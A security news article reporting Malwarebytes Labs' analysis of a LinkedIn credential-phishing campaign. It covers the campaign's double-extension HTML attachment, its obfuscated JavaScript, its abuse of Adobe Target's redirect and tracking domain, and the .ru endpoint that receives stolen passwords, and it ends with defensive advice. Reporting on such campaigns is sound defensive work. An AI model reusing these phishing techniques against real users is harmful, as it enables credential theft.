Fake LinkedIn Emails Abuse Adobe Target to Track Phishing Victims
Cybercriminals are abusing Adobe Target's A/B testing infrastructure in a LinkedIn credential phishing campaign that uses double-extension attachments and obfuscated JavaScript.
Cybercriminals are abusing Adobe Target's A/B testing platform in a LinkedIn phishing campaign that steals credentials and then redirects victims to the legitimate LinkedIn site to avoid suspicion. The attack, detailed by Malwarebytes Labs, uses fake business inquiry emails that appear to come through LinkedIn and include a double-extension attachment named `pdf.html`.
The phishing email masquerades as a business inquiry with a fake signed contract attachment. Red flags include mismatched sender names, email addresses, and signatures, as well as a company that exists but not in the US. The attachment uses a double file extension to mislead recipients into thinking it is a PDF when it is actually an HTML file.
The attached HTML file contains heavily obfuscated JavaScript, using URL encoding and Base64 to hide its functionality. When opened, the file presents a simple login form with the target's email address hardcoded, preventing the victim from changing it. This design likely prevents researchers from flooding the receiving channel with fake credentials.
Network analysis reveals that the phishing flow abuses Adobe Target's `omtrdc.net` domain as a redirect and tracking point. The attackers use Adobe Target's infrastructure to track victims who fall for the phishing email, before redirecting them to the legitimate `business.linkedin.com` site to reduce suspicion. The actual credential harvesting is handled by a PHP file hosted on a `.ru` domain.
After deobfuscating the scripts, researchers found that submitted credentials are sent via POST to `http://a1263367.xsph.ru/taam/Ln.php` with the hardcoded email address and the entered password. The PHP file then handles the redirect to LinkedIn, making the victim think they logged in successfully.
This campaign demonstrates a growing trend of attackers abusing legitimate cloud infrastructure for malicious purposes. By leveraging Adobe Target's A/B testing platform, the attackers gain a reliable redirect and tracking mechanism that can evade simple blocklists. The use of a `.ru` domain for credential exfiltration further complicates takedown efforts.
To stay safe, users should avoid unsolicited attachments, check file extensions carefully, enable multi-factor authentication, and use up-to-date anti-malware solutions. Malwarebytes Scam Guard identified the email as a scam, highlighting the importance of using security tools that can detect such threats before they cause harm.